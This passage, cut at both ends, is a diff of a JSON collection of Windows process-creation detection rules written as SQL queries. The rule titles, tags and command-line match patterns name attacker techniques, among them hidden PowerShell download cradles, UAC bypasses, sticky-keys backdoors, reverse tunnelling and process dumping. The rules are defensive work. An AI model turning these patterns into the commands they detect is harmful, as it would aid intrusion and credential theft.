NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "status": "experimental", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Legitimate usage of \".diagcab\" files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "test", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", - "status": "experimental", - "description": "Detects file download using curl.exe", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown sub processes of Wsreset.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows 